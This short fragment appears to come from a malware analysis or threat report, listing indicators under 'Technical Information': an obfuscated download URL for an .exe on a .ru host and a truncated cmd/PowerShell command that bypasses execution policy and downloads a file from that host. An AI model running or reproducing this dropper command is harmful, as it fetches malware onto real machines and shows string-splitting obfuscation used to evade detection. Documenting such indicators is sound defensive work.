Technical Information
- (ht+tp+://+f0429164.x+sph.r+u/dow+nl+o+a+d/+et+3+.exe
- '%WINDIR%\syswow64\cmd.exe' /c start powershell.exe -exec bypass -windo 1 -noexit -command Invoke-WebRequest (New-Object System.Net.WebClient).DownloadFile(('ht'+'tp'+'://'+'f0429164.x'+'sph.r'+'u/dow'+'nl'+'o'+'a'+'d/'+'...